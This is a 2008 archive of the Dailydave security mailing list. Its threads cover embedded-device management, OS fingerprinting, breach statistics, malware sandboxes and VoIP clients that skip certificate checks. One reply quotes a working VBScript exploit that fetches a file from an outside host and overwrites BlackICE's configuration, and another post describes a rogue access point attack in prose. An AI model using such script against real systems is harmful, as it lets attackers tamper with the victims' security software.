note are returning to time-share (with modern accouterment)
and so-called service-oriented architecture (SOA) or software
as a service (SAAS) are little more than time-share with the
Internet in lieu of the mainframe backplane.  Example, the
newest trading floor of which I aware has no PCs at all, only
displays driven by VMs (typically Windows) running on big
iron (typically IBM Linux) in distant, redundant, obscure
data centers.  The reason is their realization that securing
the desktop is a fool's errand and security is, in any case,
a subset of reliability.

If we are to talk about the future, then we talk about
embedded systems as they are already two orders of magnitude
more numerous than keyboards and displays hence the future
threat space, which we must lead in the same way one leads
the deer when hunting, is a threat space where a computer is
not identifiable as such but is instead inside some
nondescript appliance.

So, starting what may be an embedded system thread, let me
ask whether an embedded system should or should not have a
remote management interface?  If it does not, then a late
discovered flaw cannot be fixed without visiting all the
embedded systems which is likely to be infeasible both
because some will be where you cannot go and there will be
too many of them anyway.  If it does have a remote management
interface, the opponent of skill focuses on that and, once a
break is achieved, will use those self- same management
functions to ensure that not only does he retain control over
the long interval but, as well, you will be unlikely to know
that he is there.

This leads me to a proposal: Embedded systems, if having no
remote management interface and thus out of reach, are a life
form and, as Agent Smith said, the purpose of life is to end,
i.e., an embedded system without a remote management
interface must be so designed as to be certain to die no
later than some fixed time.  Conversely, an embedded system
with a remote management interface must be sufficiently
self-protecting that it is capable of refusing a command.

The singularity approaches,

--dan


From dave at immunityinc.com  Sat Feb 16 09:03:50 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 03:03:50 +1300
Subject: [Dailydave] NematodeMS
Message-ID: <47B6ED46.8090306@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://technology.newscientist.com/article/dn13318-friendly-worms-could-spread-software-fixes.html

I have to admit that it's cool when Microsoft builds Nematodes. :>

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHtu1GtehAhL0gheoRAllyAJ9mSzI1QWwm2CjzzSoeVV1iY27eVwCaAtA6
v8IToi0XFtZZ8WG9R2ujugY=
=j2ud
-----END PGP SIGNATURE-----


From dave at immunityinc.com  Sun Feb 17 11:20:19 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 11:20:19 -0500
Subject: [Dailydave] You are in a maze of twisty little passages, all alike
Message-ID: <47B85EC3.2050101@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Geek culture has its own literature. Adventure, the text game, is one of 
these canons, as is Zork and all the Infocomm games [1]. For a lot of 
us, Adventure was the first game we ever played. It turns out that 
someone went and did a big documentary on them, and then gave a talk 
about it at Shmoocon. He found out that the Adventure game was written 
by a caver, and based on a real cave in Kentucky. And then he took a 
video camera and shot some footage down in the original cave, where the 
birdcage room is, near the twisty little passages, all alike.

During his talk, he shows you some of the stills of the cave, and as he 
goes through them, if you've played enough Adventure, your brain can 
reconstruct the geography. From just the experience of playing a text 
game, you feel like you know your way around the cave as he goes through 
the photos. It's uncanny. You've never been there, or even seen 
drawings, but your brain tells you that you recognize the places. Yes, 
here's the hall of the mountain king, here's the birdcage room, here's 
the stream you go down to find the cave where the lamp sits. Anyways, he 
has his site up at takelamp.com. It's worth a look-see. Sometimes the 
talks you go to in a conference that are not technical are the ones you 
remember.

- -dave
[1] http://www.xs4all.nl/~pot/infocom/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHuF7DtehAhL0gheoRAr3OAJ9yE91oKMarVV6sJQyqZfhTDMB0bACfbKTx
ydryVjCFtulCGGXCCCNYmMM=
=DZjC
-----END PGP SIGNATURE-----


From dave at immunityinc.com  Sun Feb 17 11:30:51 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 11:30:51 -0500
Subject: [Dailydave] I love the smell of Cisco remotes in the morning
Message-ID: <47B8613B.4070907@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So there was a talk at Shmoocon about modifying SPIKE 2.9 to be a decent 
fuzzer for Layer 2. During the talk they demonstrated a remote stack 
overflow in some Cisco box via some random L2 protocol I'd never heard 
of before. That was very cool. :>

This has an earlier version of their talk. At some point they're going 
to put their modified SPIKE online, so everyone can find cool L2 bugs, 
although for their newer work I believe they've switch to Sulley.

http://www.day-con.org/2007/l2_fuzzing_v099r_ger.pdf

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHuGE7tehAhL0gheoRArKqAJ9MzilSKaJI9mfZMcwHe65WEiaw1gCfQi61
LDtWk6eKuBHX5KCdmLOgzKk=
=S1Mj
-----END PGP SIGNATURE-----


From dave at immunityinc.com  Sun Feb 17 12:13:35 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 12:13:35 -0500
Subject: [Dailydave] A bag of hammers
Message-ID: <47B86B3F.9060101@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Just as a warning, if you're a mathematician, you're going to cough up 
your skull at this post. I don't know first thing about real math. Don't 
say I didn't warn you.
_________________

So I often thing of some mathematical techniques as hammers that people 
use to smack at every nail, willy-nilly. For example in my sample bag of 
hammers:

o Expert Systems/Heuristics/Signatures [5]
o Neural Networks [3]
o Bayesian Classifiers/Probabilistic learning algos [4]
o Markov Chains
o FFT/DCT/Wavelets

There's lots of other examples, but some hammers are more generic and 
get used to smack at every nail, and the ones I listed are the ones you 
see every day.

I've been thinking a lot about remote OS detection, and TCP flags, and 
that sort of thing. Ofir Arkin's presentation[1] has a good point in it, 
I think. XProbe2 uses "fuzzy logic" which I assume is some sort of 
statistical heuristics based on a decision tree (Ofir's on this list, so 
we'll all get to find out the details I'm sure :>). NMap uses a 
signature lookup. I think both of those techniques could be improved on.

Essentially the problem, as I see it, is much harder than it originally 
looks. At first you think:

Attacker ------->Firewall----> Target

And you then proceed to compensate for packet loss, blocked packets, and 
whatnot. But in reality you're passing through a lot of different hardware.

Attacker --->Switch--->Firewall--->Router--->Firewall--->Target


And each of these can apply transformations to your packet, or choose to 
drop it, and each packet can go through different hosts each time, and 
come back over a different path, and your target might be different for 
each packet (say, if it is getting load balanced).  And of course, each 
port on your target might go to a different machine. Closed ports may be 
the firewall, port 80 might be the Apache server running on Linux, and 
port 25 might be forwarded to a mail gateway.

It's for this reason that CANVAS does only Application-Layer OS 
Fingerprinting now.  We try to fingerprint the OS using the same 
protocol you're trying to attack. That way we don't care that port 25 
goes to a different host entirely.

To do os fingerprinting via raw packets right you essentially have to 
discover state on a lossy network on each of maybe 20 network devices in 
between yourself and your target, which change in and out randomly, and 
even your target can be one host or multiple hosts. What you really want 
is something more like firewalk[2] that does OS detection (or at least 
"feature" detection) on all the potential devices in between you and 
your target before it does the OS detection against your target(s). 
Devices may or may not have an IP address or modify TTL, which is part 
of the fun.

w00t 07 had some interesting work[6] that optimized the ruleset for nmap 
to note that you only need one to three packets to do OS detection - 
which is a significant improvement. Of course, the benefit of having 
redundant information is that you can account more often for network 
interference during your scan, theoretically.

Anyways, my thought is this. Can you represent the network conditions in 
between you and your target(s) with a Markov Chain? Would this provide 
better results than signature/Neural Network/Classifier approaches? 
Hopefully someday soon we'll get to find out. :>

- -dave


[1]http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-*arkin*.pdf
[2]http://packetstormsecurity.org/UNIX/audit/firewalk/
[3]http://www.springerlink.com/content/j6dnbdnrjxdqbrk8/
[4]http://www.mit.edu/~rbeverly/papers/tcpclass-pam04.pdf
[5]http://synscan.sourceforge.net/taleck-synscan-2004.pdf
[6]http://www.usenix.org/event/woot07/tech/full_papers/greenwald/greenwald_html/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHuGs/tehAhL0gheoRArBcAJ4/XDV8sOHY1D5AhLHcDXO6tzMkwACcDB/D
V86UHZzivKM2PshBn2C/h5U=
=qC7q
-----END PGP SIGNATURE-----


From demottja at msu.edu  Sun Feb 17 13:05:54 2008
From: demottja at msu.edu (Jared DeMott)
Date: Sun, 17 Feb 2008 13:05:54 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: <47B6ED46.8090306@immunityinc.com>
References: <47B6ED46.8090306@immunityinc.com>
Message-ID: <47B87782.9060302@msu.edu>

Dave Aitel wrote:
> http://technology.newscientist.com/article/dn13318-friendly-worms-could-spread-software-fixes.html
>
> I have to admit that it's cool when Microsoft builds Nematodes. :>
>
Nice, that would be the final blow for net IDS in the corporate 
environment.  ("Don't worry Dave, that scanning/exploit is friendly 
fire.")  As for .edu, lets put it this way, at a recent talk the speaker 
made that point that .edus are weaker than normal (that was a shock ... 
not.), and than they're fight against having to respond to police type 
taps due to lack of funds .... gee, I wonder which nets will the Chinese 
continue to target for launch points?
Happy Sunday!
Jared
> -dave

_______________________________________________
Dailydave mailing list
Dailydave at lists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave





From rthieme at thiemeworks.com  Sun Feb 17 15:24:12 2008
From: rthieme at thiemeworks.com (Richard Thieme)
Date: Sun, 17 Feb 2008 14:24:12 -0600
Subject: [Dailydave] You are in a maze of twisty little passages,
 all alike
In-Reply-To: <47B85EC3.2050101@immunityinc.com>
References: <47B85EC3.2050101@immunityinc.com>
Message-ID: <47B897EC.5080000@thiemeworks.com>

this is a fabulous post,. thanks Dave.

I understand that the authors of Leather Goddesses of Phobos also drew 
on their own experiences while working at Sandoz as CIA contract 
employees in the early days of computing ...

Dave Aitel wrote:
> * PGP Signed by an unknown key
>
> Geek culture has its own literature. Adventure, the text game, is one of 
> these canons, as is Zork and all the Infocomm games [1]. For a lot of 
> us, Adventure was the first game we ever played. It turns out that 
> someone went and did a big documentary on them, and then gave a talk 
> about it at Shmoocon. He found out that the Adventure game was written 
> by a caver, and based on a real cave in Kentucky. And then he took a 
> video camera and shot some footage down in the original cave, where the 
> birdcage room is, near the twisty little passages, all alike.
>
> During his talk, he shows you some of the stills of the cave, and as he 
> goes through them, if you've played enough Adventure, your brain can 
> reconstruct the geography. From just the experience of playing a text 
> game, you feel like you know your way around the cave as he goes through 
> the photos. It's uncanny. You've never been there, or even seen 
> drawings, but your brain tells you that you recognize the places. Yes, 
> here's the hall of the mountain king, here's the birdcage room, here's 
> the stream you go down to find the cave where the lamp sits. Anyways, he 
> has his site up at takelamp.com. It's worth a look-see. Sometimes the 
> talks you go to in a conference that are not technical are the ones you 
> remember.
>
> -dave
> [1] http://www.xs4all.nl/~pot/infocom/
>
> * Unknown Key
> * 0xBD2085EA(L)
>
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
> .
>
>   


From dan at geer.org  Mon Feb 18 07:42:20 2008
From: dan at geer.org (dan at geer.org)
Date: Mon, 18 Feb 2008 07:42:20 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: Your message of "Sun, 17 Feb 2008 13:05:54 EST."
	<47B87782.9060302@msu.edu> 
Message-ID: <20080218124220.B5FEE33D88@absinthe.tinho.net>



Jared DeMott writes:
-+------------------
 | As for .edu, lets put it this way, at a recent talk
 | the speaker made that point that .edus are weaker than
 | normal (that was a shock ...  not.), and than they're
 | fight against having to respond to police type taps due
 | to lack of funds .... gee, I wonder which nets will the
 | Chinese continue to target for launch points?
 |


In looking at the last 500 reports from the
Identity Theft Resource Center, and ordering
them by my own little classification, I get
the following differentiation of how the
losses of records occur.  Don't take this
as Gospel since it has not-yet-understood
artifacts of what does get reported and what
does not, but I think it does show something
you will find of interest.  I am working on
this, so take with a grain of salt...

business
----------------------
insider          68.1%
laptop           17.1%
exposed          11.1%
hacking           1.3%
missing           1.0%
breakin           0.8%
unknown           0.5%
found             0.0%
paper             0.0%
CD stolen         0.0%
hacker            0.0%
email             0.0%
skimming          0.0%

bank/finance
----------------------
insider          98.2%
laptop            0.9%
paper             0.5%
exposed           0.2%
hacking           0.1%
found             0.0%
missing           0.0%
CD stolen         0.0%
breakin           0.0%
unknown           0.0%
hacker            0.0%
email             0.0%
skimming          0.0%

gov/mil
----------------------
missing          33.2%
laptop           31.1%
exposed          10.6%
paper             9.6%
hacking           9.4%
insider           3.1%
CD stolen         1.9%
breakin           1.2%
hacker            0.1%
found             0.0%
unknown           0.0%
email             0.0%
skimming          0.0%

med/health
----------------------
missing          76.6%
laptop           15.2%
hacking           2.5%
exposed           2.0%
insider           1.7%
CD stolen         1.5%
paper             0.3%
hacker            0.2%
found             0.0%
breakin           0.0%
unknown           0.0%
email             0.0%
skimming          0.0%

educational
----------------------
exposed          42.3%
hacking          39.6%
laptop           12.1%
CD stolen         4.0%
missing           1.2%
insider           0.7%
breakin           0.1%
paper             0.1%
unknown           0.0%
hacker            0.0%
found             0.0%
email             0.0%
skimming          0.0%


--dan


From pmelson at gmail.com  Mon Feb 18 10:14:52 2008
From: pmelson at gmail.com (Paul Melson)
Date: Mon, 18 Feb 2008 10:14:52 -0500
Subject: [Dailydave] NematodeMS
In-Reply-To: <47B87782.9060302@msu.edu>
References: <47B6ED46.8090306@immunityinc.com> <47B87782.9060302@msu.edu>
Message-ID: <007d01c87241$036831e0$4d00300a@ad.priorityhealth.com>

> Nice, that would be the final blow for net IDS in the corporate
environment.  ("Don't worry 
> Dave, that scanning/exploit is friendly fire.")

I would think most corporate networks of any size would continue to use WSUS
or whatever because of the degree of control it offers them.  Today I am
interested in machines requesting patches directly from Microsoft because it
means they're not part of the normal patch management cycle and could
signify other problems as well (rogue machine, off the domain, VM, etc.).
Tomorrow will be the same, and if the new patch download traffic gets
blocked by the IDS because it looks too slimy, oh well.

PaulM


From jericho at attrition.org  Mon Feb 18 13:26:46 2008
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 18 Feb 2008 18:26:46 +0000 (UTC)
Subject: [Dailydave] You are in a maze of twisty little passages,
 all alike
In-Reply-To: <47B85EC3.2050101@immunityinc.com>
References: <47B85EC3.2050101@immunityinc.com>
Message-ID: <Pine.LNX.4.64.0802181823380.8758@forced.attrition.org>


: During his talk, he shows you some of the stills of the cave, and as he 
: goes through them, if you've played enough Adventure, your brain can 
: reconstruct the geography. From just the experience of playing a text 
: game, you feel like you know your way around the cave as he goes through 
: the photos. It's uncanny. You've never been there, or even seen 
: drawings, but your brain tells you that you recognize the places. Yes, 
: here's the hall of the mountain king, here's the birdcage room, here's 
: the stream you go down to find the cave where the lamp sits. Anyways, he 
: has his site up at takelamp.com. It's worth a look-see. 

This is excellent, glad you shared this.

: Sometimes the talks you go to in a conference that are not technical are 
: the ones you remember.

Too bad most conference organizers (or the people responsible to pick 
presentations) don't realize this. Rather than accept non-technical but 
interesting (even security related) talks, the last few years they have 
tended to pick multiple presentations on the same topics. One year at 
BlackHat had several talks on XSS and SQL injection for example. 
Co-workers who sat in on those talks said they were hardly new or 
interesting.

From redhowlingwolves at nc.rr.com  Tue Feb 19 01:41:42 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Tue, 19 Feb 2008 01:41:42 -0500
Subject: [Dailydave] You are in a maze of twisty little passages,
 all alike
In-Reply-To: <Pine.LNX.4.64.0802190537220.8758@forced.attrition.org>
References: <47B85EC3.2050101@immunityinc.com>
	<Pine.LNX.4.64.0802181823380.8758@forced.attrition.org>
	<47BA6429.2090002@nc.rr.com>
	<Pine.LNX.4.64.0802190537220.8758@forced.attrition.org>
Message-ID: <47BA7A26.2070509@nc.rr.com>

security curmudgeon wrote:
> : Maybe everyone needs a fresh 'con.
> : Try CarolinaCon. It just might be worth your time?
> : 
> : It is just an upstart, but there plenty of talented people in NC.
>
> if they pay for speakers/presenters maybe. if not, while i work for the 
> company i do, they won't send me there since two of our guys live in NC =(
>
>   
That's a bummer because I believe this 'con should take off!
Maybe not at it's current location (unless you happen to be into ACC 
basketball, which is another matter) .

RTP is a hotbed of techs. They deserve a little respect.

Just a thought.
Scott

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 252 bytes
Desc: OpenPGP digital signature
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080219/ad2eda1d/attachment.pgp 

From dave at immunityinc.com  Tue Feb 19 08:05:42 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 19 Feb 2008 08:05:42 -0500
Subject: [Dailydave] jordan posted this semi-anonymously
Message-ID: <47BAD426.1020901@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dave,
~    I think that you're more referring to Hidden Markov Models, rather
than Markov Chains. Markov Chains are typically only mentioned in
theoretical discussions, HMMs are used in real tools.

I've long wondered why I haven't seen any security tools that use
these powerful tools (or Dynamic Bayes Nets; even more powerful,
easier to inject domain knowledge). Artificial Neural Nets (ANNs) are
often the wrong tool/hammer for problems involving time-series data,
and are better for classification when you just have a bag of
features. Trying to represent things like "this happened before this",
or "these things happened in this order" is messy, and while there are
things like recurrent ANNs that handle temporal data, they are
incredibly difficult to design, and usually exhibit poor performance.

ANNs are also horribly un-Bayesian in most applications that I've
seen, and so they don't give any sense of the confidence in their
hypotheses. There are good methods for getting error-bars, and the
theory of Bayesian Neural Networks is fairly well understood [1], but
Bayesian ANNs don't seem to be used in practice, from my experience. I
think that the math behind them seems intimidating, and so they are
avoided. Lastly, ANNs with more than a few hidden layers and a few
hundred nodes have been practically infeasible to train until the last
year or two, based on breakthroughs by Hinton [2].

HMM's and DBN's are much more powerful for the problems that these
applications seem to be trying to solve.

Then again I'm a machine learning researcher, not a security
researcher, so I may be way out of line even proffering an opinion on
this issue.

Also, I consider myself a mathematician, and my skull is still intact.

Jordan

[1] http://www.inference.phy.cam.ac.uk/mackay/Bayes_FAQ.html

[2] Hinton, G. E., Osindero, S. and Teh, Y. (2006),
A fast learning algorithm for deep belief nets.
Neural Computation, 18, pp 1527-1554.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHutQmtehAhL0gheoRAnHXAJ9t1eXmJbsAMd1pR/bDiXc8hMqeJgCfdFcx
qlhs6ZYe95zLTIlcMh5+rII=
=3Eup
-----END PGP SIGNATURE-----


From adriel at netragard.com  Wed Feb 20 20:03:01 2008
From: adriel at netragard.com (Adriel Desautels)
Date: Wed, 20 Feb 2008 20:03:01 -0500
Subject: [Dailydave] Google Robot and Black ICE
Message-ID: <47BCCDC5.3030009@netragard.com>

Greetings,
	I was just looking over some IDS events and noticed that Google keeps 
looking for blackice.ini on one of our web servers. Does anyone have any 
idea as to why Google would be doing this? This happens on average 3-5 
times a day. Nothing critical, just curious. Every time Google tries the 
request is denied.

Event:
------
Blocked access to : /blackice.ini
Reason		  : URL file extension is restricted by policy
SOURCE IP	  : crawl-66-249-73-113.googlebot.com
Detected On	  : Web Server Logs, NIDS, Firewall Logs




-- 

Regards,
	Adriel T. Desautels
	Chief Technology Officer
	Netragard, LLC.
	Office : 617-934-0269
	Mobile : 617-633-3821
	http://www.linkedin.com/pub/1/118/a45

	Join the Netragard, LLC. Linked In Group:
	http://www.linkedin.com/e/gis/48683/0B98E1705142

---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security
-------------- next part --------------
A non-text attachment was scrubbed...
Name: adriel.vcf
Type: text/x-vcard
Size: 298 bytes
Desc: not available
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080220/78199088/attachment.vcf 

From lmh at info-pull.com  Tue Feb 19 15:59:14 2008
From: lmh at info-pull.com (Lance M. Havok)
Date: Tue, 19 Feb 2008 21:59:14 +0100
Subject: [Dailydave] Farewell & Castro
Message-ID: <da7ca31e0802191259k197045b0h398e2d74759d71f6@mail.gmail.com>

Now Castro is finally dead, and there's no reason for me to stay here
any longer.
Consider this a farewell, it seems the security and IT industry itself
is so plagued with parasites and misers that it doesn't qualify as a
fun hobby anymore.

There's still a question left unanswered: What is more sad, someone
who excels at information security as a hobby, or someone pretending
to build a career from it without the skillset and personal
qualifications it requires, being far less talented and qualified than
the hobbyist? Like Hemingway would say, 'you either have it, or you
don't have it at all'. Don't even try.

Oh... I heard some illegal aliens have said they have never seen me
coding an exploit or (...) shellcode! Hypocrisy or they simply need to
take their heads out of their filthy butts? Whatever, learn English
(or British?).

'And he sent you on a mission, saying, 'Go and completely destroy
those wicked people, the Amalekites; make war on them until you have
wiped them out.' Samuel 15:17-19

Like it couldn't happen elsewhere... I'll be releasing an old OpenBSD
local + remote exploit (this part might not be added if time is
scarce, I find computers quite unappealing nowadays ;-) ) with a
personal touch. Some people of our fan club know it as jizz.c, others
call it 'shadow-n-omen.c' (the jealous poser omen, not part of the
Bible yet). I like the former. Hopefully my always loved & lovely Dave
will let my very last words through and we can all have something to
talk shite! (not to be confused with shiites).

Signed: I, who can't code an exploit even though my split personality
would say otherwise.
Now AFK for the rest of his life. Talent, skill-set and humor to be
invested elsewhere, obviously.

From chris.kuethe at gmail.com  Thu Feb 21 01:24:12 2008
From: chris.kuethe at gmail.com (Chris Kuethe)
Date: Wed, 20 Feb 2008 22:24:12 -0800
Subject: [Dailydave] Google Robot and Black ICE
In-Reply-To: <47BCCDC5.3030009@netragard.com>
References: <47BCCDC5.3030009@netragard.com>
Message-ID: <91981b3e0802202224j4497e1fdnf4082642f481694b@mail.gmail.com>

On Wed, Feb 20, 2008 at 5:03 PM, Adriel Desautels <adriel at netragard.com> wrote:
> Greetings,
>         I was just looking over some IDS events and noticed that Google keeps
>  looking for blackice.ini on one of our web servers. Does anyone have any
>  idea as to why Google would be doing this? This happens on average 3-5
>  times a day. Nothing critical, just curious. Every time Google tries the
>  request is denied.

Maybe at one time there was a file called /blackice.ini on your server
and it got indexed? Were you ever on a virtual host with someone who
may have had a /blackice.ini? Maybe some asshats have a link pointing
to this nonexistent file and googlebot says "hm, let's see what this
file that all these people are linking to is all about" ? I know I
still get crawled for urls that aren't on my boxen any more... but not
3-5 times a day.

Whois and traceroute suggest that if someone's pretending to be
googlebot to try mine your site, they're at least putting some effort
into it...

CK

-- 
GDB has a 'break' feature; why doesn't it have 'fix' too?

From kf_lists at digitalmunition.com  Thu Feb 21 00:34:55 2008
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Thu, 21 Feb 2008 00:34:55 -0500
Subject: [Dailydave] Google Robot and Black ICE
In-Reply-To: <47BCCDC5.3030009@netragard.com>
References: <47BCCDC5.3030009@netragard.com>
Message-ID: <9AE871DC-1308-48EE-B870-51F720F2CD03@digitalmunition.com>

My friend have you forgotten our old Black Ice exploit? God... I had  
to search my spool for the lulz as they say.

<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini",  
adSaveCreateOverwrite
</script>
maybe this will refresh your memory:

"I would like to see a panel discussion about the disclosure of lame
bugs; I am probably going to submit a white paper on it to an upcoming
conference.

We do not get too concerned about local Window's BO, unless they are in
IE, Outlook, etc that would allow for a network vector for compromise.
On a system that is more commonly deployed as a multi-user system
(unix,linux), of course we consider a local priv escalation serious and
provide protection in our host based products.

We have about 15,000 corporate customers, including most of the fortune
1000, and in my six years at ISS not a single one has asked me for our
products to detect or stop a local windows BO (besides IE or Outlook). I
am responsible for every signature in all our products."

can you name that quote? heh
-KF


On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:

> Greetings,
> 	I was just looking over some IDS events and noticed that Google  
> keeps looking for blackice.ini on one of our web servers. Does  
> anyone have any idea as to why Google would be doing this? This  
> happens on average 3-5 times a day. Nothing critical, just curious.  
> Every time Google tries the request is denied.
>
> Event:
> ------
> Blocked access to : /blackice.ini
> Reason		  : URL file extension is restricted by policy
> SOURCE IP	  : crawl-66-249-73-113.googlebot.com
> Detected On	  : Web Server Logs, NIDS, Firewall Logs
>
>
>
>
> -- 
>
> Regards,
> 	Adriel T. Desautels
> 	Chief Technology Officer
> 	Netragard, LLC.
> 	Office : 617-934-0269
> 	Mobile : 617-633-3821
> 	http://www.linkedin.com/pub/1/118/a45
>
> 	Join the Netragard, LLC. Linked In Group:
> 	http://www.linkedin.com/e/gis/48683/0B98E1705142
>
> ---------------------------------------------------------------
> Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
> Penetration Testing, Vulnerability Assessments, Website Security
> <adriel.vcf>_______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080221/dcf13de7/attachment.htm 

From dave at immunityinc.com  Thu Feb 21 07:54:05 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 21 Feb 2008 07:54:05 -0500
Subject: [Dailydave] VPC
Message-ID: <47BD746D.5040201@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat 
Federal, I learned the hard way that VPC moves memory all around and 
your previously great universal addresses don't work. So you'll end up 
trying really hard to find an address that defeats SafeSEH on 2003 SP0 
in 15 minutes or less.

Also I notice there are a lot of companies doing automated Incident 
Response or malware analysis now.

Zynamic's VxClass is obviously one of my favorites.
HBGary has retooled Inspector into a tool ("Responder") that can read 
and analyze physical memory dumps.
Mandiant has their new tool out.
Norman had a softice-looking sandbox-like thing on display.
There's another one called CWSandbox that has a free web form you can 
send exe's to. (They hook a bunch of things but I think you can escape 
the hooking by calling system calls directly?)

And let me also put it this way: If you have a source code analyzer 
product booth, and you don't let people write little C programs and have 
them analyzed, it's really annoying.

- -dave

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHvXRstehAhL0gheoRApfGAJ9Bqr7bW57kHPSxkoExDbLs+kQ3eQCdE5Of
o+Wc9Ml2BVcy2h0aoFJC630=
=lAdf
-----END PGP SIGNATURE-----


From george_ou at lanarchitect.net  Thu Feb 21 07:09:33 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Thu, 21 Feb 2008 04:09:33 -0800
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't check
	certificates
Message-ID: <000101c87482$9ee0c400$dca24c00$@net>

Looks like Vocera's wireless LAN VoIP communicators don't bother to
cryptographically confirm the validity of a digital certificate because it's
too much "processing overhead required".  This is clearly stated in the
Vocera documentation.

I am also waiting for verification on Cisco's wireless VoIP handsets.  I'm
told they have the same design flaw.

That means you can basically put up your own bogus access point with a rogue
RADIUS backend with your own self-signed digital certificate claiming it's
the same as the certificate the client is use to seeing.  Since the client
never bothers to cryptographically check the signature, it thinks it's
talking to the right server and it will send its hashed password or pin to
the server making it very easy to crack.


I have more details here:
http://blogs.zdnet.com/security/?p=896



George Ou


From demottja at msu.edu  Thu Feb 21 10:01:04 2008
From: demottja at msu.edu (Jared DeMott)
Date: Thu, 21 Feb 2008 10:01:04 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <47BD9230.2090502@msu.edu>

Dave Aitel wrote:
> So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat
> Federal, I learned the hard way that VPC moves memory all around and
> your previously great universal addresses don't work. So you'll end up
> trying really hard to find an address that defeats SafeSEH on 2003 SP0
> in 15 minutes or less.
>
> Also I notice there are a lot of companies doing automated Incident
> Response or malware analysis now.
>
> Zynamic's VxClass is obviously one of my favorites.
> HBGary has retooled Inspector into a tool ("Responder") that can read
> and analyze physical memory dumps.
> Mandiant has their new tool out.
> Norman had a softice-looking sandbox-like thing on display.
> There's another one called CWSandbox that has a free web form you can
> send exe's to. 
Actually Norman and CW both have a web interface.  However, I believe CW 
to be a bit better -- based on one case study of newer malware.  I just 
did some research and wrote a paper/created slides for a talk I'm giving 
at a local west Michigan sec group.  I put the slides up on my site if 
anyone would like to take a peek:
http://www.vdalabs.com/tools/malware.html

I'm relatively new to the malware scene, so I'd appreciate constructive 
feedback.
Cheers,
Jared

From george_ou at lanarchitect.net  Thu Feb 21 16:19:10 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Thu, 21 Feb 2008 13:19:10 -0800
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't
	check	certificates
In-Reply-To: <47BD8A0F.8000901@hasborg.com>
References: <000101c87482$9ee0c400$dca24c00$@net>
	<47BD8A0F.8000901@hasborg.com>
Message-ID: <000c01c874cf$673a5eb0$35af1c10$@net>

Sure, if the client does not lock down the "server name" subject field in
the certificate, and the certificate authority isn't locked down to an
internal CA, then it's as good as wide open.  The EAP clients are very hard
to properly configure unlike the typical web browser which automatically
compares the certificate subject field to the URL address.

This Vocera/Cisco case is much worse though, since no amount of care in the
deployment is going to help you.  The client makes zero effort to verify the
certificate due to CPU resource limitations in these Wireless embedded
devices.


George

-----Original Message-----
From: Joshua Wright [mailto:jwright at hasborg.com] 
Sent: Thursday, February 21, 2008 6:26 AM
To: George Ou
